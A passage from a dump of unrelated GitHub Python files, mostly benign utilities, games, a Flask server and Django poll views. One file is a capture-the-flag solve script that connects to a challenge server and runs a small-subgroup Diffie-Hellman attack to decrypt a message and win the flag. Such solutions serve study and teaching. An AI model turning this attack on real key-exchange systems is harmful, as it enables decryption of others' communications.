= 5000\n\n#define tables in database\nclass log(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n plat = db.Column(db.String(15))\n waktu = db.Column(db.String(30))\n\nclass history(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n plat = db.Column(db.String(15))\n waktuMasuk = db.Column(db.String(30))\n waktuKeluar = db.Column(db.String(30))\n argo = db.Column(db.String(8))\n\n@app.route('/')\ndef main():\n return render_template('main.html')\n\n\n#import necessary functions from utils.py\nfrom utils import *\n\n@app.route('/post', methods = [\"POST\"])\ndef post():\n plat = request.data\n plat = plat.decode(\"utf-8\")\n #returns the price if detected plat in database. otherwise, write plat to database\n output = processToDatabase(plat, ARGO_PER_HOUR)\n\n print(output)\n \n return ''\n\n@app.route('/purge', methods = ['GET', 'POST'])\ndef purge():\n if request.method == 'POST':\n total_purged = purgeAll(history)\n return \"Purged: \" + str(total_purged)\n else:\n return render_template('purge.html')\n\n@app.route('/viewLog')\ndef viewLog():\n from mq_new import db, log\n\n all_query = db.session.query(log).all()\n data_count = len(all_query)\n\n \n return render_template('viewLog.html', data = all_query, data_count = data_count)\n\n@app.route('/viewHistory')\ndef viewHistory():\n from mq_new import db, history\n\n all_query = db.session.query(history).all()\n data_count = len(all_query)\n\n \n return render_template('viewHistory.html', data = all_query, data_count = data_count)\n\n@app.route('/aboutUs')\ndef aboutUs():\n return render_template('aboutUs.html')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port= 8090)\n","repo_name":"AldyKwee/ComNet-Class-Project","sub_path":"Phase-3_Ticketing/RASPBERRY PI SOURCE CODE/Previous Code/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6093087995","text":"import numpy as np\nimport math\n\nfrom numba import vectorize\nfrom numba import jit\n\n\ndef smooth(x,window_len=11,window='hanning'):\n \"\"\"smooth the data using a window with requested size.\n \n This method is based on the convolution of a scaled window with the signal.\n The signal is prepared by introducing reflected copies of the signal \n (with the window size) in both ends so that transient parts are minimized\n in the begining and end part of the output signal.\n \n input:\n x: the input signal \n window_len: the dimension of the smoothing window; should be an odd integer\n window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\n flat window will produce a moving average smoothing.\n\n output:\n the smoothed signal\n \n example:\n\n t=linspace(-2,2,0.1)\n x=sin(t)+randn(len(t))*0.1\n y=smooth(x)\n \n see also: \n \n numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve\n scipy.signal.lfilter\n \n TODO: the window parameter could be the window itself if an array instead of a string\n NOTE: length(output) != length(input), to correct this: return y[(window_len/2-1):-(window_len/2)] instead of just y.\n \"\"\"\n\n if x.ndim != 1:\n raise ValueError(\"smooth only accepts 1 dimension arrays.\")\n\n if x.size < window_len:\n raise ValueError(\"Input vector needs to be bigger than window size.\")\n\n\n if window_len<3:\n return x\n\n\n if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:\n raise ValueError(\"Window is on of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\")\n\n\n s=np.r_[x[window_len-1:0:-1],x,x[-1:-window_len:-1]]\n #print(len(s))\n if window == 'flat': #moving average\n w=np.ones(window_len,'d')\n else:\n w=eval('numpy.'+window+'(window_len)')\n\n y=np.convolve(w/w.sum(),s,mode='valid')\n \n #return y\n return y[(int(window_len/2)-1):-(int(window_len/2))]\n\ndef count_zero(a): \n eps = 1e-5\n #vals = a[a < eps]\n vals = np.where(a < min_vel_in_pixels, 1, 0)\n \n if len(vals) == 0:\n return 0.0\n else:\n return np.sum(vals)\n \ndef max_outliers(a): \n eps = 1e-5\n #vals = a[a < eps]\n vals = np.where(a > max_vel_in_pixels, a, 0)\n \n if len(vals) == 0:\n return 0.0\n else:\n return np.max(vals)\n\ndef high_corr(a): \n eps = 1e-5\n #vals = a[a < eps]\n vals = np.where(a > min_corr_value, a, 0)\n \n if len(vals) == 0:\n return 0.0\n else:\n return np.mean(vals)\n \ndef low_corr(a): \n eps = 1e-5\n #vals = a[a < eps]\n vals = np.where(a < min_corr_value, a, 0)\n \n if len(vals) == 0:\n return 0.0\n else:\n return np.mean(vals)\n \n \ndef avg_nonzero(a): \n \n non_zero_vals = a[a > 0]\n \n if len(non_zero_vals) == 0:\n return 0.0\n else:\n return np.mean(non_zero_vals)\n \ndef std_nonzero(a): \n \n non_zero_vals = a[a != 0]\n \n if len(non_zero_vals) == 0:\n return 0.0\n else:\n return np.std(non_zero_vals)\n \n@jit\ndef avg_non_zero_numba(a):\n num = 0\n sum_val = 0\n \n for i in range(len(a)):\n if a[i] > 0:\n sum_val += a[i]\n num += 1\n if num == 0:\n return 0\n \n return sum_val / num\n\n@jit\ndef avg_non_zero_full(a):\n \n nz = a.shape[0]\n ny = a.shape[1]\n nx = a.shape[2]\n \n res = np.zeros_like(a[0])\n \n for i in range(ny):\n for j in range(nx):\n \n num = 0\n sum_val = 0\n \n for k in range(nz):\n\n val = a[k,i,j]\n \n if val != 0:\n sum_val += val \n num += 1\n \n if num == 0:\n res[i,j] = 0\n else:\n res[i,j] = sum_val / num \n \n return res\n \ndef mul3(a, b, c):\n return a*b*c\n\ndef mul4(a, b, c, d):\n return a*b*c*d\n\nvec_mul3 = vectorize('float64(float64, float64, float64)', target='parallel')(mul3)\nvec_mul4 = vectorize('float64(float64, float64, float64, float64)', target='parallel')(mul4)","repo_name":"axruff/spraylab","sub_path":"numerics.py","file_name":"numerics.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42399614602","text":"import os\n\nfrom utils import get_actual, ints\n\n\ndef run_input(l):\n pos = 0\n while True:\n opcode = l[pos]\n\n if opcode == 99:\n return\n\n pos1 = l[pos + 1]\n pos2 = l[pos + 2]\n pos3 = l[pos + 3]\n\n if opcode == 1:\n l[pos3] = l[pos1] + l[pos2]\n\n if opcode == 2:\n l[pos3] = l[pos1] * l[pos2]\n\n pos += 4\n\n\nif __name__ == \"__main__\":\n day = os.path.dirname(os.path.abspath(__file__)).rsplit(\"/\", 1)[-1]\n input_list = get_actual(day=int(day), year=2019)\n\n int_list = ints(input_list)\n target = 19690720\n\n for x in range(100):\n for y in range(100):\n solution = 0\n\n new_list = int_list.copy()\n new_list[1] = x\n new_list[2] = y\n\n run_input(new_list)\n\n solution = new_list[0]\n\n if solution == target:\n break\n if solution == target:\n break\n\n print(new_list[0], 100 * x + y)\n","repo_name":"justcallmelarry/advent-of-code-2019","sub_path":"02/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24731022038","text":"import random\n\nclass BlockType(): # 设置 方块的类型\n NoShape = 0\n ZShape = 1\n LShape = 2\n TShape = 3\n OShape = 4\n IShape = 5\n SShape = 6\n _IShape = 7\n\n init_shape = ( # 方块的相对坐标\n (), # None\n ((-1, 0), (0, 0), ( 0, -1), (1, -1)), # Z\n (( 0, 1), (0, 0), ( 0, -1), (1, -1)), # L\n ((-1, 0), (0, 0), ( 1, 0), (0, -1)), # T\n ((-1, 0), (0, 0), (-1, -1), (0, -1)), # 口\n (( 0, 1), (0, 0), ( 0, -1), (0, -2)), # I\n (( 1, 0), (0, 0), ( 0, -1), (-1, -1)), # S (Z 的镜像)\n (( 0, 1), (0, 0), ( 0, -1), (-1, -1)), # _/ (L 的镜像)\n )\n\nclass Shape():\n def __init__(self):\n self.vertex = [] # 方块的点\n self.type = 0 # 方块的类型\n self.color = '#000000' # 方块的颜色\n\n def getRandomShape(self):\n self.type = random.randint(1,7) # 1 <= N <=7\n self.vertex = [ list(v) for v in BlockType.init_shape[self.type] ] # 所有tuple 转化为list\n self.color = hex(random.randint(0,0xffffff)).replace('0x', '#').upper() # '0xf2f5ab' 转化为 '#F2F5AB'\n\n def rotate(self, str): # 旋转\n if not self.vertex or self.type == 4:\n return\n\n nVertex = []\n if str == 'Clockwise':\n for x, y in self.vertex: # 没个点变为(y, -x) 可根据极坐标得出: x = rcos(θ-π/2) = rsin(θ) = y\n nVertex.append([y, -x])\n\n else:\n for x, y in self.vertex:\n nVertex.append([-y, x])\n\n self.vertex = nVertex\n\n def xRange(self): # x的范围\n xList = [v[0] for v in self.vertex]\n minX = min(xList)\n maxX = max(xList)\n return (minX, maxX)\n\n def yRange(self): # y的范围\n yList = [v[1] for v in self.vertex]\n minY = min(yList)\n maxY = max(yList)\n return (minY, maxY)\n\n \n\nif __name__ == '__main__':\n shape = Shape()\n print(shape.vertex)\n shape.getRandomShape()\n print(shape.vertex)\n shape.rotate('Clockwise')\n print(shape.vertex)\n shape.rotate(\"Anticlockwise\")\n print(shape.vertex)","repo_name":"Brococoli/Tetris-Game","sub_path":"Shape.py","file_name":"Shape.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70135374570","text":"# Script to capture images for training and testing.\nimport cv2\nfrom skimage import io, transform\n\n# Create binary image.\ndef binaryMask(frame):\n roi = frame\n\n gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (5, 5), 2)\n th3 = cv2.adaptiveThreshold(blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 11, 2)\n ret, res = cv2.threshold(th3, 70, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n return res\n\n# Resize the input image.\ndef reSize(img, output_size):\n if len(img.shape) < 3:\n img = img.reshape(img.shape[0], img.shape[1], 1)\n else:\n img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n img = img.reshape(img.shape[0], img.shape[1], 1)\n img = transform.resize(img, (output_size, output_size), mode='constant')\n return img\n\n# Capture video image\ncap = cv2.VideoCapture(0)\n\ncv2.namedWindow('Bigger', cv2.WINDOW_NORMAL)\n# fgbg = cv2.createBackgroundSubtractorMOG2()\n# fgbg = cv2.bgsegm.createBackgroundSubtractorMOG(history=1, nmixtures=5, backgroundRatio=0.1, noiseSigma=0.02)\n# fgbg = cv2.createBackgroundSubtractorMOG2(history=0, varThreshold=100, detectShadows=True)\n# set rt size as 640x480\nret = cap.set(3, 400)\nret = cap.set(4, 400)\n\ncount = 0\nwhile True:\n ret, frame = cap.read()\n frame = cv2.flip(frame, 1)\n roi = binaryMask(frame)\n\n # cv2.imshow('frame', frame)\n cv2.imshow('roi', roi)\n\n if cv2.waitKey(1) & 0xFF == ord('g'):\n count += 1\n print ('%dth image' % count)\n resized_img = cv2.resize(roi, (200, 200))\n cv2.imwrite('./new_test_img/ok' + str(count) + '.png', resized_img)\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Firmamenter/CNN-for-Real-time-Gesture-Recognition-and-Task-Control","sub_path":"CaptureBinary.py","file_name":"CaptureBinary.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40774182105","text":"import pandas as pd\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\n\nNUM_INDIVIDUAL_PLOTS = 10\nDEFAULT_NUM_SIMS = 2500\nDEFAULT_NUM_TIMES_BETS_REPEATED = 5\nCSV_FILE = 'griffy_bet_history.csv'\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Simulate sports betting outcomes.\")\n parser.add_argument(\"--s\", type=int, default=DEFAULT_NUM_SIMS, help=\"Number of simulations to run\")\n parser.add_argument(\"--r\", type=int, default=DEFAULT_NUM_TIMES_BETS_REPEATED, help=\"Number of times the bet history is repeated to simulate a longer period\")\n\n args = parser.parse_args()\n num_sims = args.s\n num_times_bets_repeated = args.r\n \n '''\n num_sims: number of simulations to run\n num_times_bets_repeated: number of times the bet history is repeated to simulate a longer period of time\n '''\n\n bets_csv = pd.read_csv(CSV_FILE)\n bets_placed_df = bets_csv[['odds', 'clv', 'stake', 'potential_payout', 'bet_type']]\n bets_placed_df = bets_placed_df[bets_placed_df['bet_type'] == \"positive_ev\"]\n bets_placed_df = bets_placed_df[bets_placed_df[\"clv\"].apply(lambda x: isinstance(x, float))]\n bets_placed_df['clv'] = bets_placed_df['clv'].apply(american_to_percent)\n\n num_positive_outcomes = 0\n num_bets = len(bets_placed_df)\n\n all_sims_df = pd.DataFrame(index=range(num_sims), columns=['sim_index', 'bankroll', 'sim_bankroll_history'])\n\n for i in range(num_sims):\n print(f\"--{i} sims completed out of {num_sims}\", end='\\r')\n individual_sim_df = simulate_bet_history(bets_placed_df, i, NUM_INDIVIDUAL_PLOTS, num_times_bets_repeated)\n all_sims_df.loc[i] = individual_sim_df\n\n all_sims_df[\"sim_bankroll_history\"]\n\n bankrolls = all_sims_df['bankroll']\n\n num_positive_outcomes = len(all_sims_df[all_sims_df['bankroll'] > 0])\n mean_bankroll = bankrolls.mean()\n max_bankroll = bankrolls.max()\n min_bankroll = bankrolls.min()\n break_even_percent = num_positive_outcomes / num_sims\n\n fig, (ax1, ax2, ax3) = plt.subplots(1, 3)\n\n all_sims_df[all_sims_df['sim_index'] < NUM_INDIVIDUAL_PLOTS].set_index('sim_index')['sim_bankroll_history'].apply(pd.Series).T.plot(ax = ax1, legend = False)\n\n\n ax2.hist(bankrolls, bins = 100, orientation = 'horizontal')\n\n ax1.set_title('Bankroll by Bet Number')\n ax1.set_xlabel('Bet Number')\n ax1.set_ylabel('Bankroll')\n\n ax2.set_title(f'Bankroll Distribution (Mean: {mean_bankroll:.2f})')\n ax2.set_xlabel('Bankroll')\n ax2.set_ylabel('Frequency')\n\n ax2.axhline(y=0, color='r', linestyle='-')\n\n ax3.set_title('Plot of Bankrolls')\n ax3.set_xlabel('Bankroll')\n ax3.set_ylabel('Frequency')\n\n ax3.boxplot(bankrolls, vert = True, showfliers=False, labels=['Bankrolls'])\n quartiles = np.quantile(bankrolls, [0.25, 0.5, 0.75])\n for quartile in quartiles:\n ax3.text(1.1, quartile, f'${quartile:.2f}', horizontalalignment='left', size='medium', color='black', weight='semibold')\n\n min_bankroll = min(bankrolls)\n max_bankroll = max(bankrolls)\n ax1.set_ylim(min_bankroll, max_bankroll)\n ax2.set_ylim(min_bankroll, max_bankroll)\n ax3.set_ylim(min_bankroll, max_bankroll)\n\n fig.set_size_inches(18.5, 10.5)\n\n fig.suptitle(f'Break Even Percentage: {(break_even_percent * 100):.2f}%\\nNumber of Bets: {num_bets * num_times_bets_repeated}')\n\n plt.show()\n\ndef american_to_percent (american):\n if american > 0:\n return 100 / (100 + american)\n else:\n return -american / (100 - american)\n\ndef simulate_bet_history(bets, sim_index, NUM_PLOTS, NUM_TIMES_SIM):\n bankroll = 0\n bankroll_history = []\n\n # if the random win probability is less than the clv, then the bet was a win\n for _ in range(NUM_TIMES_SIM):\n # for when need to track bankroll history for plotting\n if sim_index < NUM_PLOTS:\n for bet in bets.itertuples():\n random_win_prob = random.random()\n if random_win_prob < bet.clv:\n bankroll += bet.potential_payout \n bankroll -= bet.stake\n\n bankroll_history.append(bankroll)\n\n # for when only tracking bankroll at the end of each simulation is needed (faster)\n else:\n random_win_probs = np.random.rand(len(bets))\n win_mask = random_win_probs < bets['clv']\n\n # only add the payout if the bet was a win\n bankroll += (win_mask * (bets['potential_payout']) - bets['stake']).sum()\n\n sims_df_row = {'sim_index': sim_index, 'bankroll': bankroll, 'sim_bankroll_history': bankroll_history}\n\n return sims_df_row\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jakeflynn39/griffy-sharps","sub_path":"griffy_sharps.py","file_name":"griffy_sharps.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22691625400","text":"from django.shortcuts import get_object_or_404, render, Http404\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.urls import reverse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\n\nfrom .models import Question,User,Choice,VoteReason\nfrom .forms import UserForm, Questions, Choices, Questions1\nfrom django.contrib.admin.views.decorators import staff_member_required\n#@staff_member_required\n\n\n# Create your views here.\n\ndef index(request):\n # from Question set class find all categories and make a distinguish according to status.\n question_list1 = Question.objects.filter(status=Question.Status_Draft)\n question_list2 = Question.objects.filter(status=Question.Status_Voting)\n question_list3 = Question.objects.filter(status=Question.Status_End)\n question_list4 = Question.objects.filter(status=Question.Status_Deleted)\n\n context = {\n 'question_list1': question_list1,\n 'question_list2': question_list2,\n 'question_list3': question_list3,\n 'question_list4': question_list4,\n }\n \n return render(request,'first_app/index.html', context)\n\ndef question_status_modify(request, question_id):\n question = Question.objects.get(pk=question_id)\n vote_reason_list = VoteReason.objects.all()\n if request.method == \"POST\":\n print(question)\n # Fetch list of items to delete, by ID\n items_to_delete = request.POST.getlist('delete_items')\n print(request.POST)\n print(items_to_delete)\n # Delete those items all in one go\n choice_to_delete = Choice.objects.filter(pk__in=items_to_delete)\n choice_to_delete.delete()\n\n question_form = Questions(request.POST,instance=question,initial={'question': question})\n \n if question_form.is_valid():\n question_form.save()\n # messages.success(request,_('success!'))\n messages.success(request, ' Question updated.')\n \n print(question_form.cleaned_data)\n # return render(request,'first_app/index1.html', {'question':question})\n else:\n # the form was invalid if this else gets called.\n print(question_form.errors)\n else: \n question_form = Questions(instance=question,initial={'question': question})\n # choice_form = Choices() \n return render(request,'first_app/question_status_modify.html',\n {'question_form':question_form, 'question': question,'vote_reason_list': vote_reason_list})\n \n # if question.status == 0:\n # if request.method == 'POST':\n # question.question_text = request.POST.get('question_text')\n # question.status = request.POST.get('status')\n # question.save()\n # question = Question.objects.get(pk=question_id)\n\n # choice = Choice()\n # choice.question = question\n # choice.voter = request.user\n # choice.choice_text = request.POST.get('choice_text')\n # choice.save()\n\n # # Fetch list of items to delete, by ID\n # items_to_delete = request.POST.getlist('delete_items')\n # # Delete those items all in one go\n # # Choice.objects.filter(pk__in=items_to_delete).delete()\n # choice_to_delete = Choice.objects.filter(pk__in=items_to_delete)\n # choice_to_delete.delete()\n \n # print(question.status)\n # # if choice_to_delete is None:\n # # print(1)\n # # else:\n # # print(2)\n\n # else:\n # render(request,'first_app/index.html',)\n \n \n # return HttpResponse('Error')\n # choice = Choice()\n # question.question = request.POST['choice_text']\n\n\n\ndef question_modify_interval(request,choice_id):\n choice = Choice.objects.get(pk=choice_id)\n voter = request.user\n # selected_choice = question.choice_in_question.get(pk=request.POST['choice'])\n # choice_text = Choice.objects.filter(question=question)\n if request.method == \"POST\":\n choice_form = Choices(data = request.POST,instance=choice,initial={'choice': choice})\n \n if choice_form.is_valid():\n choice_form.save()\n \n print(choice_form.cleaned_data)\n question_list1 = Question.objects.filter(status=Question.Status_Draft)\n question_list2 = Question.objects.filter(status=Question.Status_Voting)\n question_list3 = Question.objects.filter(status=Question.Status_End)\n question_list4 = Question.objects.filter(status=Question.Status_Deleted)\n\n context = {\n 'question_list1': question_list1,\n 'question_list2': question_list2,\n 'question_list3': question_list3,\n 'question_list4': question_list4,\n }\n \n return render(request,'first_app/index.html', context)\n else:\n # the form was invalid if this else gets called.\n print(choice_form.errors)\n else: \n choice_form = Choices(instance=choice, initial={'choice': choice}) \n return render(request,'first_app/question_modify_interval.html',\n {'choice_form':choice_form, 'choice_text':choice})\n\ndef detail(request, question_id):\n question = Question.objects.get(pk=question_id)\n \n if request.method == \"POST\":\n print(question)\n question_form = Questions1(request.POST,instance=question,initial={'question': question})\n \n if question_form.is_valid():\n question_form.save()\n \n print(question_form.cleaned_data)\n # return render(request,'first_app/index1.html', {'question':question})\n else:\n # the form was invalid if this else gets called.\n print(question_form.errors)\n else: \n question_form = Questions1(instance=question,initial={'question': question})\n # choice_form = Choices() \n return render(request,'first_app/detail.html',\n {'question_form':question_form, 'question': question})\n \n # try:\n # question = Question.objects.get(pk=question_id)\n # except Question.DoesNotExist:\n # raise Http404(\"Question does not exist\") \n # return render(request, 'first_app/detail.html', {'question': question})\n\ndef detail1(request, question_id):\n question = Question.objects.get(pk=question_id)\n return render(request,'first_app/detail1.html',\n {'question': question})\n\ndef detail3(request, question_id):\n question = Question.objects.get(pk=question_id)\n print(question)\n return render(request,'first_app/detail3.html',\n {'question': question})\n\ndef results(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'polls/results.html', {'question': question})\n\n\n@login_required\ndef vote(request, question_id): \n question = Question.objects.get(pk=question_id)\n # choice = get_object_or_404(Choice, pk=choice_id)\n user = request.user\n # reason0 = VoteReason.objects.filter(choice=choice, voter=user)\n # print(reason0)\n # if reason0 is None:\n #if Vote.objects.filter(question=question,voter=request.user).exists():\n #if UserProfileInfo.objects.filter(user=request.user).exists() and Choice.objects.filter(question=question).exists():\n\n if request.method == \"POST\": \n \n reason = VoteReason()\n reason.choice = question.choice_in_question.get(pk=request.POST['choice'])\n reason.voter = user\n\n reason_text = request.POST.get('reason') \n reason.reason = reason_text\n reason.save()\n try:\n selected_choice = question.choice_in_question.get(pk=request.POST['choice'])\n except (KeyError, Choice.DoesNotExist):\n return render(request, 'first_app/detail.html', {\n 'question': question,\n 'error_message': \"You didn't select a choice.\",\n })\n else:\n selected_choice.votes += 1\n selected_choice.voter = user\n selected_choice.save()\n \n # return HttpResponseRedirect(reverse('polls:results', args=(question.id,)))\n # return render(request, 'first_app/index.html',)\n return HttpResponse('Voted successfully')\n \ndef register(request):\n registered = False\n if request.method == \"POST\":\n print(request.POST)\n user_form = UserForm(data=request.POST)\n # print(user_form)\n if user_form.is_valid():\n user=user_form.save()\n user.set_password(user.password)\n print(user_form.cleaned_data)\n registered = True\n # print(user_form.username)\n \n # print(user_form.password)\n else:\n # the form was invalid if this else gets called.\n print(user_form.errors)\n else: \n user_form = UserForm()\n return render(request,'first_app/registration.html',\n {'user_form':user_form,\n 'registered':registered})\n \n\ndef user_login(request):\n if request.method =='POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(username=username,password=password)\n if user:\n if user.is_active:\n login(request,user)\n return HttpResponseRedirect(reverse('index'))\n else:\n return HttpResponse(\"Account not active\")\n else:\n print(\"Someone try to login and failed, which means the authentication not pass\")\n print(\"Username{},password{}\".format(username,password))\n return HttpResponse(\"invalid login details supplied\")\n else:\n return render(request,'first_app/login.html',{})\n\n@login_required\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect(reverse('index'))\n\ndef state_draft(request, question_id):\n if question.status == 0:\n pass","repo_name":"XiaoyuZhao1996-byte/Django","sub_path":"quiz/first_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30088482532","text":"import pwn\nimport Crypto.Util.number as cun\nimport Crypto.Random.random as crr\nimport Crypto.Util.Padding as cup\nfrom Crypto.Cipher import AES\nimport hashlib\n\n\ndef subgroup_attack(ct, p, g):\n x = g\n while x != 1:\n shared_key = x\n aes_key = hashlib.sha1(cun.long_to_bytes(shared_key)).digest()[:16]\n cipher = AES.new(aes_key, AES.MODE_ECB)\n try:\n pt = cup.unpad(cipher.decrypt(ct), 16)\n if b\"My favorite food is \" in pt:\n return pt\n except:\n pass\n\n x = (x * g) % p\n\n\n# io = pwn.process(\"python3 ../dist/server.py\", shell=True)\n# io = pwn.remote(\"localhost\", 4000)\nio = pwn.remote(\"35.224.135.84\", 4000)\n\n# Mersenne prime: https://www.mersenne.org/primes\np = (1 << 2203) - 1\n\n# Prime factor of (p - 1) from factordb:\n# http://factordb.com/index.php?query=2%5E2203+-+2\nq = 711718443060888357455104383759579899185453159253854240850359788937324328008225366876777905349283339583535597500393178373807851032788989008946432082299780350922963303\n\nio.sendlineafter(\"Please help them choose p: \", str(p))\nio.sendlineafter(\"give me a large prime factor of (p - 1): \", str(q))\n\nio.recvuntil(\"Here's their encrypted message: \")\nct = bytes.fromhex(io.recvlineS())\n\npt = subgroup_attack(ct, p, g=8)\nio.sendlineafter(\"Decrypt it and I'll give you the flag: \", pt)\nio.interactive()\n","repo_name":"qxxxb/ctf_challenges","sub_path":"2021/ccc/crypto/poison_prime/solve/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"16484033494","text":"# Description\n # A good game needs a good interface. \n # In this stage, you will make your output user-friendly.\n\n # The player should be able to see the domino snake, the so-called playing field, and their own pieces. \n # It's a good idea to enumerate these pieces because throughout the game the player will be selecting them to make a move.\n\n # Two things must remain hidden from the player: \n # the stock pieces and the computer's pieces. \n # The player should not be able to see them, only the number of pieces remaining.\n\n# Objectives\n # Print the header using seventy equal sign characters (=).\n# print('='*70)\n # Print the number of dominoes remaining in the stock – Stock size: [number].\n# print(f'Stock size: [{len(stock_pieces)}]')\n # Print the number of dominoes the computer has – Computer pieces: [number].\n# print(f'Computer pieces: [{len(computer_pieces)}]')\n # Print the domino snake. At this stage, it consists of the only starting piece.\n# print(domino_pieces)\n # Print the player's pieces, Your pieces:, and then one piece per line, enumerated.\n# for piece in player_pieces:\n# print(piece)\n# Print the status of the game:\n# print(f'Status: {status}')\n # If status = \"computer\", print \"Status: Computer is about to make a move. Press Enter to continue...\"\n# if status == 'computer':\n# print('Computer is about to make a move. Press Enter to continue...')\n# status = 'player'\n # If status = \"player\", print \"Status: It's your turn to make a move. Enter your command.\"\n# if status == 'player':\n# print('It's your turn to make a move. Enter your command')\n# status = 'computer'\n # Note that both these statuses suppose that the next move will be made, but at this stage, the program should stop here. We will implement other statuses (like \"win\", \"lose\", and \"draw\") in the stages to come.\n\nfrom Creation import *\nfrom Functions import interface, display_turns\npieces = create_shuffled_pieces()\nstock_pieces, computer_pieces, player_pieces, domino_pieces, status = distribute_pieces(pieces)\ninterface(stock_pieces, computer_pieces, player_pieces, domino_pieces)\n\nprint(f'\\nStatus:', end= ' ')\n# If status = \"computer\", print \"Status: Computer is about to make a move. Press Enter to continue...\"\nif status == 'computer':\n print('Computer is about to make a move. Press Enter to continue...')\n # status = 'player'\n# If status = \"player\", print \"Status: It's your turn to make a move. Enter your command.\"\nelif status == 'player':\n print(\"It's your turn to make a move. Enter your command\")\n # status = 'computer'","repo_name":"devThinKoki/learning_repo","sub_path":"JetBrains_Academy/Python_Development_Course/Easy_Dominoes/02_The-Interface.py","file_name":"02_The-Interface.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15947913806","text":"from math import log10\n\n\ndef is_prime(n):\n if n < 2: return False\n if n == 2: return True\n if n % 2 == 0: return False\n \n i = 3\n while i*i <= n:\n if n % i == 0:\n return False\n i += 2\n\n return True\n\n\ndef func(n, _len, rem_id):\n if _len == 1:\n return\n\n n = (n-n%(10**rem_id))//10 + n%(10**(rem_id-1))\n\n if is_prime(n):\n res.add(n)\n for i in range(1, _len+1):\n func(n, _len-1, i)\n\n\nn = int(input())\n_len = int(log10(n)) + 1\nres = set()\nfor i in range(1, _len):\n func(n, _len-1, i)\n\nfor e in res:\n print(e)\n","repo_name":"proman3419/AGH-WIET-INF-WDI-2020","sub_path":"6/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29428450637","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app01', '0077_auto_20180621_1713'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='carousel',\n name='newlink',\n field=models.URLField(verbose_name='轮播推荐文章链接', blank=True, null=True),\n ),\n migrations.AlterField(\n model_name='carousel',\n name='webpurl',\n field=models.URLField(verbose_name='web图片链接地址', blank=True, null=True),\n ),\n ]\n","repo_name":"wangyc666666/WoBanN","sub_path":"app01/migrations/0078_auto_20180621_1721.py","file_name":"0078_auto_20180621_1721.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16017880704","text":"import colorama\n\nfrom . import get, show, utils\nfrom .config import CONFIG\n\n__author__ = \"Yohan Min\"\n__version__ = \"3.4.2\"\n\n\ndef show_aops_data(\n code,\n stalk_users=None,\n find_posts=None,\n search_method=None,\n find_text=None,\n **kwargs\n):\n \"\"\"Show data extracted from AoPS on the terminal.\n\n It is recommended to only extract an AoPS topic with 1000 or less posts, due\n to the time limit of the Selenium script execution.\n\n Args:\n code (str): Code of the AoPS category or topic. It will be automatically\n determined if the code belongs to a category or a topic.\n stalk_users (set of str): Users to stalk in this topic. If a user we\n want to stalk posted or liked a post from this topic, we will be\n notified.\n find_posts (list of int): Post numbers to find in this topic.\n search_method (list of str): Strings to be searched in this category. It\n will guide us to find a sequence of subcategories and subfolders\n containing those texts.\n find_text (str): Text to find in the items from this category.\n \"\"\"\n for arg, value in kwargs.items():\n CONFIG[arg] = value\n\n if \"write_files\" in CONFIG and CONFIG[\"write_files\"]:\n CONFIG[\"write_html\"] = CONFIG[\"write_json\"] = True\n\n colorama.init()\n\n if \"h\" in code:\n json_file = \"topic-data.json\"\n data, begin_time = get.get_topic_data(code)\n\n if CONFIG[\"write_html\"] or CONFIG[\"write_json\"]:\n utils.create_path(data[\"category_id\"], data[\"topic_id\"])\n\n show.show_topic_data(data, stalk_users, find_posts)\n\n else:\n json_file = \"category-data.json\"\n data, 